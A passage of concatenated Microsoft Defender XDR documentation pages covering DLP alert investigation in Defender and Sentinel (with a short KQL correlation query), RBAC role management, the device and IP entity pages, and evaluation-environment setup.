-1. To view the incident summary page, select the incident from the queue. Similarly, select the alert to view the DLP alert page.
-
-1. View the **Alert story** for details about policy and the sensitive information types detected in the alert. Select the event in the **Related Events** section to see the user activity details.
-
-1. View the matched sensitive content in the **Sensitive info types** tab and the file content in the **Source** tab if you have the required permission (See details <a href="/microsoft-365/compliance/dlp-alerts-dashboard-get-started#roles" target="_blank">here</a>).
-
-### Extend DLP alert investigation with advanced hunting
-
-Advanced hunting is a query-based threat hunting tool that lets you explore up to 30 days of audit logs of user, files and site locations to aid in your investigation. You can proactively inspect events in your network to locate threat indicators and entities. The flexible access to data enables unconstrained hunting for both known and potential threats.
-
-The **CloudAppEvents** table contains all audit logs across all locations like SharePoint, OneDrive, Exchange and Devices.
-
-#### Before you begin
-
-If you're new to advanced hunting, you should review [Get started with advanced hunting](/microsoft-365/security/defender/advanced-hunting-overview).
-
-Before you can use advance hunting you must have [access to the **CloudAppEvents** table](/defender-cloud-apps/protect-office-365#connect-microsoft-365-to-microsoft-defender-for-cloud-apps) that contains the Microsoft Purview data.
-
-#### Using built in queries
-
-> [!IMPORTANT]
-> This feature is in preview. Preview features aren't meant for production use and may have restricted functionality. These features are available before an official release so that customers can get early access and provide feedback.
-
-The Defender portal offers multiple built-in queries you can use to help with your DLP alert investigation.
-
-1. Go to the Microsoft Defender portal, and select **Incidents & alerts** in the left hand navigation menu to open the incidents page. Select **Incidents**.
-1. Select **Filters** on the top right, and choose **Service Source : Data Loss Prevention** to view all incidents with DLP alerts.
-1. Open a DLP incident.
-1. Select on an alert to view its associated events.
-1. Select an event.
-1. In the event details pane, select the **Go Hunt** control.
- 1. Defender shows you a list of built-in queries that are relevant to the source location of the event. For example, if the event is from SharePoint you see
- 1. **File shared with**
- 1. **File activities**
- 1. **Site activity**
- 1. **User DLP violations for last 30 days**
-1. You can choose to **Run query** immediately, change the time range, edit or save the query for later use.
-1. Once you run the query, view the results on the **Results** tab.
-
-If the alert is for an email message, you can download the message by selecting **Actions** \> **Download email**.
-
-If the alert is for a file in SharePoint Online or One Drive for Business, you can take these actions:
--- Apply retention label-- Unshare-- Delete-- Apply sensitivity label-- Download ([data classification content viewer role](/microsoft-365/security/office-365-security/scc-permissions#role-groups-in-microsoft-defender-for-office-365-and-microsoft-purview-compliance) is required for this action)-- Withdraw feedback-
-For remediation actions, select the **User card** on the top of the alert page to open the user details.
-
-For Devices DLP alerts, select the device card on the top of the alert page to view the device details and take remediation actions on the device.
-
-Go to the incident summary page and select **Manage Incident** to add incident tags, assign, or resolve an incident.
-
-## Related articles
--- [Incidents overview](incidents-overview.md)-- [Prioritize incidents](incident-queue.md)-- [Manage incidents](manage-incidents.md)
security Dlp Investigate Alerts Sentinel https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/dlp-investigate-alerts-sentinel.md
- Title: Investigate data loss prevention alerts with Microsoft Sentinel
-description: Investigate data loss prevention alerts in Microsoft Sentinel.
- - NOCSH
-----
- - m365-security
- - tier2
-
- - MOE150
- - met150
Previously updated : 07/11/2023--
-# Investigate data loss prevention alerts with Microsoft Sentinel
--
-**Applies to:**
--- Microsoft Defender XDR-- Microsoft Sentinel-
-## Before you start
-
-See, [Investigate data loss prevention alerts with Microsoft Defender XDR](dlp-investigate-alerts-defender.md) for more details.
-
-## DLP investigation experience in Microsoft Sentinel
-
-You can use the Microsoft Defender XDR connector in Microsoft Sentinel to import all DLP incidents into Sentinel to extend your correlation, detection, and investigation across other data sources and extend your automated orchestration flows using Sentinel's native SOAR capabilities.
-
-1. Follow instructions on Connect data from Microsoft Defender XDR to Microsoft Sentinel to import all incidents including DLP incidents and alerts into Sentinel. Enable `CloudAppEvents` event connector to pull all Office 365 audit logs into Sentinel.
-
- You should be able to see your DLP incidents in Sentinel once the above connector is set up.
-
-2. Select **Alerts** to view the alert page.
-
-3. You can use **AlertType**, **startTime**, and **endTime** to query the **CloudAppEvents** table to get all the user activities that contributed to the alert. Use this query to identify the underlying activities:
-
-```kusto
-let Alert = SecurityAlert
-| where TimeGenerated > ago(30d)
-| where SystemAlertId == ""; // insert the systemAlertID here
-CloudAppEvents
-| extend correlationId1 = parse_json(tostring(RawEventData.Data)).cid
-| extend correlationId = tostring(correlationId1)
-| join kind=inner Alert on $left.correlationId == $right.AlertType
-| where RawEventData.CreationTime > StartTime and RawEventData.CreationTime < EndTime
-```
-
-## Related articles
--- [Incidents overview](incidents-overview.md)-- [Prioritize incidents](incident-queue.md)-- [Manage incidents](manage-incidents.md)
security Edit Delete Rbac Roles https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/edit-delete-rbac-roles.md
- Title: Edit or delete roles Microsoft Defender XDR Unified role-based access control (RBAC)
-description: Edit or delete roles in Microsoft Defender XDR Security portal experiences using role-based access control (RBAC)
------- m365-security-- tier3-- Previously updated : 08/03/2023---
-# Edit, delete and export roles in Microsoft Defender XDR Unified role-based access control (RBAC)
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-- [Microsoft Defender for Identity](https://go.microsoft.com/fwlink/?LinkID=2198108)-- [Microsoft Defender for Office 365 P2](https://go.microsoft.com/fwlink/?LinkID=2158212)-- [Microsoft Defender Vulnerability Management](https://go.microsoft.com/fwlink/?linkid=2229011)-- [Microsoft Defender for Cloud](/azure/defender-for-cloud/defender-for-cloud-introduction)-
-In Microsoft Defender XDR Unified role-based access control (RBAC), you can edit and delete custom roles or roles that were imported from Defender for Endpoint, Defender for Identity, or Defender for Office 365.
-
-## Edit roles
-
-The following steps guide you on how to edit roles in Microsoft Defender XDR Unified RBAC:
-
-> [!IMPORTANT]
-> You must be a Global Administrator or Security Administrator in Microsoft Entra ID, or have all the **Authorization** permissions assigned in Microsoft Defender XDR Unified RBAC to perform this task. For more information on permissions, see [Permission pre-requisites](../defender/manage-rbac.md#permissions-pre-requisites).
-
-1. Sign in to the [Microsoft Defender portal](https://security.microsoft.com) as global administrator or security administrator.
-2. In the navigation pane, select **Permissions**.
-3. Select **Roles** under Microsoft Defender XDR to get to the Permissions and roles page.
-4. Select the role you want to edit. You can only edit one role at a time.
-5. Once selected, this opens a flyout pane where you can edit the role:
-
- :::image type="content" source="../../media/defender/m365-defender-rbac-edit-roles.png" alt-text="Screenshot of the edit roles flyout page" lightbox="../../media/defender/m365-defender-rbac-edit-roles.png":::
-
-> [!NOTE]
-> After editing an imported role, the changes made in Microsoft Defender XDR Unified RBAC will not be reflected back in the individual product RBAC model.
-
-## Delete roles
-
-To delete roles in Microsoft Defender XDR Unified RBAC, select the role or roles you want to delete and select **Delete roles**.
-
-If the workload is active, by removing the role all assigned user permission will be deleted.
-
-> [!NOTE]
-> After deleting an imported role, the role won't be deleted from the individual product RBAC model. If needed, you can re-import it to the Microsoft Defender XDR Unified RBAC list of roles.
-
-## Export roles
-
-The Export feature enables you to export the following roles data:
--- Role name-- Role description-- Permissions included in the role-- The assignment name-- The assigned data sources-- The assigned users or user groups-
-When a role has multiple assignments, each assignment will be represented as a separate row in the CSV file.
-
-The CSV also includes a snapshot of the Unified RBAC activation status for each workload available on the tenant.
-
-The following steps guide you on how to export roles in Microsoft Defender XDR Unified RBAC:
-
->[!Note]
->To export roles, you must be a Global Administrator or Security Administrator in Microsoft Entra ID, or have the **Authorization (manage)** permission assigned for all data sources in Microsoft Defender XDR Unified RBAC and have at least one workload activated for Unified RBAC.
->
->For more information on permissions, see [Permission pre-requisites](../defender/manage-rbac.md#permissions-pre-requisites).
-
-1. Sign in to the [Microsoft Defender portal](https://security.microsoft.com) with the required roles or permissions.
-2. In the navigation pane, select **Permissions**.
-3. Select **Roles** under Microsoft Defender XDR to get to the Permissions and roles page.
-4. Select the **Export** button.
-
- :::image type="content" source="../../media/defender/m365-defender-rbac-export-roles.png" alt-text="Screenshot of the export roles page" lightbox="../../media/defender/m365-defender-rbac-export-roles.png":::
-
-A CSV file containing all the roles data will be generated and downloaded to the local machine.
-
-## Next steps
--- [Learn about RBAC permissions](custom-permissions-details.md)-- [Map existing RBAC roles to Microsoft Defender XDR Unified RBAC roles](compare-rbac-roles.md)
security Entity Page Device https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/entity-page-device.md
- Title: Device entity page in Microsoft Defender
-description: The device entity page in the Microsoft Defender portal helps you in your investigation of device entities. The page has all the important information about each entity. If an alert or incident indicates that a device might be compromised or is behaving suspiciously, check and investigate the device entity.
------- m365-security-- tier3-- usx-security- Previously updated : 03/27/2024
-appliesto:
- - Microsoft Defender XDR
- - Microsoft Sentinel in the Microsoft Defender portal
--
-<!-- redirected from device-profile.md -->
-
-# Device entity page in Microsoft Defender
--
-The device entity page in the Microsoft Defender portal helps you in your investigation of device entities. The page contains all the important information about a given device entity. If an alert or incident indicates that a device is behaving suspiciously or might be compromised, investigate the details of the device to identify other behaviors or events that might be related to the alert or incident, and discover the potential scope of the breach. You can also use the device entity page to perform some common security tasks, as well as some response actions to mitigate or remediate security threats.
-
-> [!IMPORTANT]
-> The content set displayed on the device entity page may differ slightly, depending on the device's enrollment in Microsoft Defender for Endpoint and Microsoft Defender for Identity.
->
-> If your organization onboarded Microsoft Sentinel to the Defender portal, additional information will appear.
->
-> In Microsoft Sentinel, device entities are also known as **host** entities. [Learn more](/azure/sentinel/entities-reference).
->
-> [!INCLUDE [unified-soc-preview-no-alert](../../includes/unified-soc-preview-no-alert.md)]
-
-Device entities can be found in the following areas:
--- Devices list, under **Assets**-- Alerts queue-- Any individual alert/incident-- Any individual user entity page-- Any individual file details view-- Any IP address or domain details view-- Activity log-- Advanced hunting queries-- Action center-
-You can select devices whenever you see them in the portal to open the device's entity page, which displays more details about the device. For example, you can see the details of devices listed in the alerts of an incident in the Microsoft Defender portal at **Incidents & alerts > Incidents > *incident* > Assets > Devices**.
--
-The device entity page presents its information in a tabbed format. This article lays out the types of information available in each tab, and also the actions you can take on a given device.
-
-The following tabs are displayed on the device entity page:
--- [Overview](#overview-tab)-- [Incidents and alerts](#incidents-and-alerts-tab)-- [Timeline](#timeline-tab)-- [Security recommendations](#security-recommendations-tab)-- [Inventories](#inventories-tab)-- [Discovered vulnerabilities](#discovered-vulnerabilities-tab)-- [Missing KBs](#missing-kbs-tab)-- [Security baselines](#missing-kbs-tab)-- [Security policies](#missing-kbs-tab)-- [Sentinel events](#sentinel-events-tab)-
-## Entity page header
-
-The topmost section of the entity page includes the following details:
--- **Entity name**-- **Risk severity**, **criticality**, and **device value** indicators-- **Tags** by which the device can be classified. Can be added by Defender for Endpoint, Defender for Identity, or by users. Tags from Microsoft Defender for Identity aren't editable.-- **[Response actions](#response-actions)** are also located here. Read more about them below.-
-## *Overview* tab
-
-The default tab is **Overview**. It provides a quick look at the most important security facts about the device.
-The **Overview** tab contains the [device details](#device-details) sidebar and a [dashboard](#dashboard) with some cards displaying high-level information.
-
-### Device details
-
-The sidebar lists the device's full name and exposure level. It also provides some important basic information in small subsections, which can be expanded or collapsed, such as:
-
-| Section | Included information |
-| - | -- |
-| **VM details** | Machine and domain names and IDs, health and onboarding statuses, timestamps for first and last seen, IP addresses, and more |
-| **DLP policy sync details** | If relevant |
-| **Configuration status** | Details regarding Microsoft Defender for Endpoint configuration |
-| **Cloud resource details** | Cloud platform, resource ID, subscription information, and more |
-| **Hardware and firmware** | VM, processor, and BIOS information, and more |
-| **Device management** | Microsoft Defender for Endpoint enrollment status and management info |
-| **Directory data** | [UAC](/windows/security/identity-protection/user-account-control/user-account-control-overview) flags, [SPNs](/windows/win32/ad/service-principal-names), and group memberships. |
-
-### Dashboard
-
-The main part of the **Overview** tab shows several dashboard-type display cards:
--- **Active alerts** and risk level involving the device over the last six months, grouped by severity-- **Security assessments** and exposure level of the device-- **Logged on users** on the device over the last 30 days-- **Device health status** and other information on the most recent scans of the device.-
- > [!TIP]
- > Exposure level relates to how much the device is complying with security recommendations, while risk level is calculated based on a number of factors, including the types and severity of active alerts.
--
-## *Incidents and alerts* tab
-
-The **Incidents and alerts** tab contains a list of incidents that contain alerts that have been raised on the device, from any of a number of Microsoft Defender detection sources, including, if onboarded, Microsoft Sentinel. This list is a filtered version of the [incidents queue](incidents-overview.md), and shows a short description of the incident or alert, its severity (high, medium, low, informational), its status in the queue (new, in progress, resolved), its classification (not set, false alert, true alert), investigation state, category, who is assigned to address it, and last activity observed.
-
-You can customize which columns are displayed for each item. You can also filter the alerts by severity, status, or any other column in the display.
-
-The *impacted entities* column refers to all the device and user entities referenced in the incident or alert.
-
-When an incident or alert is selected, a fly-out appears. From this panel you can manage the incident or alert and view more details such as incident/alert number and related devices. Multiple alerts can be selected at a time.
-
-To see a full page view of an incident or alert, select its title.
--
-## *Timeline* tab
-
-The **Timeline** tab displays a chronological view of all events that have been observed on the device. This can help you correlate any events, files, and IP addresses in relation to the device.
-
-The choice of columns displayed on the list can both be customized. The default columns list the event time, active user, action type, associated entities (processes, files, IP addresses), and additional information about the event.
-
-You can govern the time period for which events are displayed by sliding the borders of the time period along the overall timeline graph at the top of the page. You can also pick a time period from the drop-down at the top of the list (the default is 30 days). To further control your view, you can filter by event groups or customize the columns.
-
-You can export up to seven days' worth of events to a CSV file, for download.
-
-Drill down into the details of individual events by selecting and event and viewing its details in the resulting flyout panel. See [Event details](#event-details) below.
-
-> [!NOTE]
-> For firewall events to be displayed, you'll need to enable the audit policy, see [Audit Filtering Platform connection](/windows/security/threat-protection/auditing/audit-filtering-platform-connection).
->
-> Firewall covers the following events:
->
-> - [5025](/windows/security/threat-protection/auditing/event-5025) - firewall service stopped
-> - [5031](/windows/security/threat-protection/auditing/event-5031) - application blocked from accepting incoming connections on the network
-> - [5157](/windows/security/threat-protection/auditing/event-5157) - blocked connection
--
-#### Event details
-
-Select an event to view relevant details about that event. A flyout panel displays to show much more information about the event. The types of information displayed depends on the type of event. When applicable and data is available, you might see a graph showing related entities and their relationships, like a chain of files or processes. You might also see a summary description of the MITRE ATT&CK tactics and techniques applicable to the event.
-
-To further inspect the event and related events, you can quickly run an [advanced hunting](advanced-hunting-overview.md) query by selecting **Hunt for related events**. The query returns the selected event and the list of other events that occurred around the same time on the same endpoint.
--
-### *Security recommendations* tab
-
-The **Security recommendations** tab lists actions you can take to protect the device. Selecting an item on this list opens a flyout where you can get instructions on how to apply the recommendation.
-
-As with the previous tabs, the choice of displayed columns can be customized.
-
-The default view includes columns that detail the security weaknesses addressed, the associated threat, the related component or software affected by the threat, and more. Items can be filtered by the recommendation's status.
-
-Learn more about [security recommendations](../defender-vulnerability-management/tvm-security-recommendation.md).
--
-### *Inventories* tab
-
-This tab displays inventories of four types of components: Software, vulnerable components, browser extensions, and certificates.
-
-#### Software inventory
-
-This card lists software installed on the device.
-
-The default view displays the software vendor, installed version number, number of known software weaknesses, threat insights, product code, and tags. The number of items displayed and which columns are displayed can both be customized.
-
-Selecting an item from this list opens a flyout containing more details about the selected software, and the path and timestamp for the last time the software was found.
-
-This list can be filtered by product code, weaknesses, and the presence of threats.
--
-#### Vulnerable components
-
-This card lists software components that contain vulnerabilities.
-
-The default view and filtering options are the same as for software.
-
-Select an item to display more information in a flyout.
-
-#### Browser extensions
-
-This card shows the browser extensions installed on the device. The default fields displayed are the extension name, the browser for which it's installed, the version, the permission risk (based on the type of access to devices or sites requested by the extension), and the status. Optionally, the vendor can also be displayed.
-
-Select an item to display more information in a flyout.
-
-#### Certificates
-
-This card displays all the certificates installed on the device.
-
-The fields displayed by default are the certificate name, issue date, expiration date, key size, issuer, signature algorithm, key usage, and number of instances.
-
-The list can be filtered by status, self-signed or not, key size, signature hash, and key usage.
-
-Select a certificate to display more information in a flyout.
-
-### *Discovered vulnerabilities* tab
-
-This tab lists any Common Vulnerabilities and Exploits (CVEs) that may affect the device.
-
-The default view lists the severity of the CVE, the Common Vulnerability Score (CVSS), the software related to the CVE, when the CVE was published, when the CVE was first detected and last updated, and threats associated with the CVE.
-
-As with the previous tabs, the choice of columns to be displayed can be customized. The list can be filtered by severity, threat status, device exposure, and tags.
-
-Selecting an item from this list opens a flyout that describes the CVE.
--
-### *Missing KBs* tab
-
-The **Missing KBs** tab lists any Microsoft Updates that have yet to be applied to the device. The "KBs" in question are [Knowledge Base articles](https://support.microsoft.com/help/242450/how-to-query-the-microsoft-knowledge-base-by-using-keywords-and-query), which describe these updates; for example, [KB4551762](https://support.microsoft.com/help/4551762/windows-10-update-kb4551762).
-
-The default view lists the bulletin containing the updates, OS version, the KB ID number, products affected, CVEs addressed, and tags.
-
-The choice of columns to be displayed can be customized.
-
-Selecting an item opens a flyout that links to the update.
-
-### *Sentinel events* tab
-
-If your organization onboarded Microsoft Sentinel to the Defender portal, this additional tab is on the device entity page. This tab imports the [Host entity page from Microsoft Sentinel](/azure/sentinel/entity-pages).
-
-### Sentinel timeline
-
-This timeline shows alerts associated with the device entity, known in Microsoft Sentinel as the *host* entity. These alerts include those seen on the **Incidents and alerts** tab and those created by Microsoft Sentinel from third-party, non-Microsoft data sources.
-
-This timeline also shows [bookmarked hunts](/azure/sentinel/bookmarks) from other investigations that reference this user entity, user activity events from external data sources, and unusual behaviors detected by Microsoft Sentinel's [anomaly rules](/azure/sentinel/soc-ml-anomalies).
-
-### Insights
-
-Entity insights are queries defined by Microsoft security researchers to help you investigate more efficiently and effectively. These insights automatically ask the big questions about your device entity, providing valuable security information in the form of tabular data and charts. The insights include data regarding sign-ins, group additions, process executions, anomalous events and more, and include advanced machine learning algorithms to detect anomalous behavior.
-
-The following are some of the insights shown:
--- Screenshot taken on the host.-- Processes unsigned by Microsoft detected.-- Windows process execution info.-- Windows sign-in activity.-- Actions on accounts.-- Event logs cleared on host.-- Group additions.-- Enumeration of hosts, users, groups on host.-- Microsoft Defender Application Control.-- Process rarity via entropy calculation.-- Anomalously high number of a security event.-- Watchlist insights (Preview).-- Windows Defender Antivirus events.-
-The insights are based on the following data sources:
--- Syslog (Linux)-- SecurityEvent (Windows)-- AuditLogs (Microsoft Entra ID)-- SigninLogs (Microsoft Entra ID)-- OfficeActivity (Office 365)-- BehaviorAnalytics (Microsoft Sentinel UEBA)-- Heartbeat (Azure Monitor Agent)-- CommonSecurityLog (Microsoft Sentinel)--
-If you want to further explore any of the insights in this panel, select the link accompanying the insight. The link takes you to the **Advanced hunting** page, where it displays the query underlying the insight, along with its raw results. You can modify the query or drill down into the results to expand your investigation or just satisfy your curiosity.
--
-## Response actions
-
-Response actions offer shortcuts to analyze, investigate, and defend against threats.
--
-> [!IMPORTANT]
-> - [Response actions](/windows/security/threat-protection/microsoft-defender-atp/respond-machine-alerts) are only available if the device is enrolled in Microsoft Defender for Endpoint.
-> - Devices that are enrolled in Microsoft Defender for Endpoint may display different numbers of response actions, based on the device's OS and version number.
-
-Response actions run along the top of a specific device page and include:
-
-| Action | Description |
-| | -- |
-| **Device value** | |
-| **Set criticality** | |
-| **Manage tags** | Updates custom tags you've applied to this device. |
-| **Report device inaccuracy** | |
-| **Run Antivirus Scan** | Updates Microsoft Defender Antivirus definitions and immediately runs an antivirus scan. Choose between Quick scan or Full scan. |
-| **Collect Investigation Package** | Gathers information about the device. When the investigation is completed, you can download it. |
-| **Restrict app execution** | Prevents applications that aren't signed by Microsoft from running. |
-| **Initiate automated investigation** | Automatically [investigates and remediates threats](../office-365-security/air-about.md). Although you can manually trigger automated investigations to run from this page, [certain alert policies](../../compliance/alert-policies.md#default-alert-policies) trigger automatic investigations on their own. |
-| **Initiate Live Response Session** | Loads a remote shell on the device for [in-depth security investigations](/microsoft-365/security/defender-endpoint/live-response). |
-| **Isolate device** | Isolates the device from your organization's network while keeping it connected to Microsoft Defender. You can choose to allow Outlook, Teams, and Skype for Business to run while the device is isolated, for communication purposes. |
-| **Ask Defender Experts** | |
-| **Action Center** | Displays information about any response actions that are currently running. Only available if another action has already been selected. |
-| **Download force release from isolation script** | |
-| **Exclude** | |
-| **Go hunt** | |
-| **Turn on troubleshooting mode** | |
-| **Policy sync** | |
-
-## Related topics
--- [Microsoft Defender XDR overview](microsoft-365-defender.md)-- [Turn on Microsoft Defender XDR](m365d-enable.md)-- [User entity page in Microsoft Defender](investigate-users.md)-- [IP address entity page in Microsoft Defender](entity-page-ip.md)-- [Microsoft Defender XDR integration with Microsoft Sentinel](microsoft-365-defender-integration-with-azure-sentinel.md)-- [Connect Microsoft Sentinel to Microsoft Defender XDR (preview)](microsoft-sentinel-onboard.md)-
security Entity Page Ip https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/entity-page-ip.md
- Title: IP address entity page in Microsoft Defender
-description: The IP address entity page in the Microsoft Defender portal helps you in your investigation of IP address entities that appear in incidents and alerts. The page has all the important information about each entity. If an alert or incident indicates that an IP address is the source or target of suspicious behavior, check and investigate the IP address.
------- m365-security-- tier2-- usx-security- Previously updated : 03/27/2024
-appliesto:
- - Microsoft Defender XDR
- - Microsoft Sentinel in the Microsoft Defender portal
--
-# IP address entity page in Microsoft Defender
--
-The IP address entity page in the Microsoft Defender portal helps you examine possible communication between your devices and external internet protocol (IP) addresses.
-
-Identifying all devices in the organization that communicated with a suspected or known malicious IP address, such as Command and Control (C2) servers, helps determine the potential scope of breach, associated files, and infected devices.
-
-You can find information from the following sections in the IP address entity page:
--- [Overview](#overview)-- [Incidents and alerts](#incidents-and-alerts)-- [Observed in organization](#observed-in-organization)-- [Sentinel events](#sentinel-events)---
-## Overview
-
-In the left pane, the **Overview** page provides a summary of IP details (if available).
-
-| Section | Details |
-| - | - |
-| Security info | <li>Open incidents<li>Active alerts |
-| IP details | <li>Organization (ISP)<li>ASN<li>Country/Region, State, City<li>Carrier<li>Latitude and longitude<li>Postal code |
-
-The left side also has a panel showing Log activity (time first seen/last seen, data source) collected from several log sources, and another panel showing a list of logged hosts collected from Azure Monitoring Agent heartbeat tables.
-
-The main body of the **Overview** page contains dashboard cards showing a count of incidents and alerts (grouped by severity) containing the IP address, and a chart of the prevalence of the IP address in the organization over the indicated time period.
-
-## Incidents and alerts
-
-The **Incidents and alerts** page shows a list of incidents and alerts that include the IP address as part of their story. These incidents and alerts come from any of a number of Microsoft Defender detection sources, including, if onboarded, Microsoft Sentinel. This list is a filtered version of the [incidents queue](incidents-overview.md), and shows a short description of the incident or alert, its severity (high, medium, low, informational), its status in the queue (new, in progress, resolved), its classification (not set, false alert, true alert), investigation state, category, who is assigned to address it, and last activity observed.
-
-You can customize which columns are displayed for each item. You can also filter the alerts by severity, status, or any other column in the display.
-
-The *impacted assets* column refers to all the user, application, and other entities referenced in the incident or alert.
-
-When an incident or alert is selected, a fly-out appears. From this panel you can manage the incident or alert and view more details such as incident/alert number and related devices. Multiple alerts can be selected at a time.
-
-To see a full page view of an incident or alert, select its title.
-
-## Observed in organization
-
-The **Observed in organization** section provides a list of devices that have a connection with this IP and the last event details for each device (the list is limited to 100 devices).
-
-## Sentinel events
-
-If your organization onboarded Microsoft Sentinel to the Defender portal, this additional tab is on the IP address entity page. This tab imports the [IP entity page from Microsoft Sentinel](/azure/sentinel/entity-pages).
-
-### Sentinel timeline
-
-This timeline shows alerts associated with the IP address entity. These alerts include those seen on the **Incidents and alerts** tab and those created by Microsoft Sentinel from third-party, non-Microsoft data sources.
-
-This timeline also shows [bookmarked hunts](/azure/sentinel/bookmarks) from other investigations that reference this IP entity, IP activity events from external data sources, and unusual behaviors detected by Microsoft Sentinel's [anomaly rules](/azure/sentinel/soc-ml-anomalies).
-
-### Insights
-
-Entity insights are queries defined by Microsoft security researchers to help you investigate more efficiently and effectively. These insights automatically ask the big questions about your IP entity, providing valuable security information in the form of tabular data and charts. The insights include data from various IP threat intelligence sources, network traffic inspection, and more, and include advanced machine learning algorithms to detect anomalous behavior.
-
-The following are some of the insights shown:
--- Microsoft Defender Threat Intelligence reputation.-- Virus Total IP Address.-- Recorded Future IP Address.-- Anomali IP Address-- AbuseIPDB.-- Anomalies count by IP address.-- Network traffic inspection.-- IP address remote connections with TI match.-- IP address remote connections.-- This IP has a TI match.-- Watchlist insights (Preview).-
-The insights are based on the following data sources:
--- Syslog (Linux)-- SecurityEvent (Windows)-- AuditLogs (Microsoft Entra ID)-- SigninLogs (Microsoft Entra ID)-- OfficeActivity (Office 365)-- BehaviorAnalytics (Microsoft Sentinel UEBA)-- Heartbeat (Azure Monitor Agent)-- CommonSecurityLog (Microsoft Sentinel)-
-If you want to further explore any of the insights in this panel, select the link accompanying the insight. The link takes you to the **Advanced hunting** page, where it displays the query underlying the insight, along with its raw results. You can modify the query or drill down into the results to expand your investigation or just satisfy your curiosity.
-
-## Response actions
-
-Response actions offer shortcuts to analyze, investigate, and defend against threats.
-
-Response actions run along the top of a specific IP entity page and include:
-
-| Action | Description |
-| | -- |
-| **Add indicator** | Opens a wizard for you to add this IP address as an Indicator of Compromise (IoC) to your Threat Intelligence knowledgebase. |
-| **Open cloud app IP settings** | Opens the IP address ranges configuration screen for you to add the IP address to it. |
-| **Investigate in Activity log** | Opens the Microsoft 365 Activity log screen for you to look for the IP address in other logs. |
-| **Go hunt** | Opens the **Advanced hunting** page, with a built-in hunting query to find instances of this IP address. |
-
-## Related topics
--- [Microsoft Defender XDR overview](microsoft-365-defender.md)-- [Turn on Microsoft Defender XDR](m365d-enable.md)-- [Device entity page in Microsoft Defender](entity-page-device.md)-- [User entity page in Microsoft Defender](investigate-users.md)-- [Microsoft Defender XDR integration with Microsoft Sentinel](microsoft-365-defender-integration-with-azure-sentinel.md)-- [Connect Microsoft Sentinel to Microsoft Defender XDR (preview)](microsoft-sentinel-onboard.md)
security Eval Create Eval Environment https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/eval-create-eval-environment.md
- Title: Create the Microsoft Defender XDR Evaluation Environment for greater cyber security and XDR
-description: Learn what's included in the Microsoft Defender XDR you evaluate, and se up your Microsoft Defender XDR trial lab or pilot environment by activating trial licenses. Start your XDR cyber security journey here and learn how to take that test to production.
-
- - NOCSH
-- Previously updated : 05/19/2021--
- - m365-security
- - m365solution-scenario
- - m365solution-evalutatemtp
- - zerotrust-solution
- - highpri
- - tier1
--
-# Step 1. Create the Microsoft Defender XDR Evaluation Environment for greater cyber security
-
-You can learn about and build out this Microsoft Defender XDR solution in steps that are distributed through the rest of this series:
--- [How to create the environment](eval-create-eval-environment.md)-- Set up or learn about each technology of this Microsoft XDR
- - [Microsoft Defender for Identity](eval-defender-identity-overview.md)
- - [Microsoft Defender for Office](eval-defender-office-365-overview.md)
- - [Microsoft Defender for Endpoint](eval-defender-endpoint-overview.md)
- - [Microsoft Defender for Cloud Apps](eval-defender-mcas-overview.md)
-- [How to investigate and respond using this XDR](eval-defender-investigate-respond.md)-- [Promote the trial environment to production](eval-defender-promote-to-production.md)-- [Back to the Overview](eval-overview.md)-
-The steps in this series run end-to-end, from learning the concepts behind the Microsoft Defender XDR to building it, and into taking the evaluation environment live to production.
-
-There are two common ways to do this next step in evaluation. This series assumes you already have a production Microsoft 365 tenant and are activating Microsoft 365 E5 trial licenses to evaluate Microsoft Defender XDR in *the current environment*. An in-place evaluation will let you keep any security methods with the purchase of licenses after the evaluation period.
-
-The second is to [Set up your Microsoft Defender XDR trial lab environment](setup-m365deval.md) for evaluation. It might not have many real signals from the business while in testing.
-
-<a name='you-will-need-to-activate-e5-trial-licenses-to-evaluate-microsoft-365-defender'></a>
-
-## You need to activate Microsoft 365 E5 trial licenses to evaluate Microsoft Defender XDR
-
-1. Sign in your existing Microsoft 365 tenant administration portal.
-2. Select **Purchase Services** from the navigation menu.
-3. Scroll down to the Office 365 section and select **Details** button under Office 365 E5 license.
-
- :::image type="content" source="../../medio-eval-license-details.png":::
-
-4. Select **Start free trial** link.
-
- :::image type="content" source="../../medio-eval/3-m365-purchase-button.png":::
-
-5. Confirm your request and select **Try now** button.
-
- :::image type="content" source="../../medio-trial-order.png":::
-
-## Go to the next step
-
-[Learn how to enable Microsoft 365 for Identity](eval-defender-identity-overview.md)
-
-Or return to the Overview for [Evaluate and pilot Microsoft Defender XDR](eval-overview.md)
security Eval Defender Endpoint Architecture https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/eval-defender-endpoint-architecture.md
- Title: Review Microsoft Defender for Endpoint architecture requirements and key concepts
-description: The technical diagram for Microsoft Defender for Endpoint in Microsoft Defender XDR will help you understand identity in Microsoft 365 before you build your trial lab or pilot environment.
-
- - NOCSH
-- Previously updated : 07/09/2021--
- - m365-security
- - m365solution-scenario
- - m365solution-evalutatemtp
- - zerotrust-solution
- - highpri
- - tier1
---
-# Review Microsoft Defender for Endpoint architecture requirements and key concepts
-
-**Applies to:**
-Microsoft Defender XDR
-
-This article will guide you in the process of setting up the evaluation for Microsoft Defender for Endpoint environment.
-
-For more information about this process, see the [overview article](eval-defender-endpoint-overview.md).
-
-Before enabling Microsoft Defender for Endpoint, be sure you understand the architecture and can meet the requirements.
-
-## Understand the architecture
-
-The following diagram illustrates Microsoft Defender for Endpoint architecture and integrations.
--
-The following table describes the illustration.
-
-Call-out | Description
-:|:|
-1 | Devices are on-boarded through one of the supported management tools.
-2 | On-boarded devices provide and respond to Microsoft Defender for Endpoint signal data.
-3 | Managed devices are joined and/or enrolled in Microsoft Entra ID.
-4 | Domain-joined Windows devices are synchronized to Microsoft Entra ID using Microsoft Entra Connect.
-5 | Microsoft Defender for Endpoint alerts, investigations, and responses are managed in Microsoft Defender XDR.
-
-## Understand key concepts
-
-The following table identified key concepts that are important to understand when evaluating, configuring, and deploying Microsoft Defender for Endpoint:
-
-Concept | Description | More information
-:|:|:|
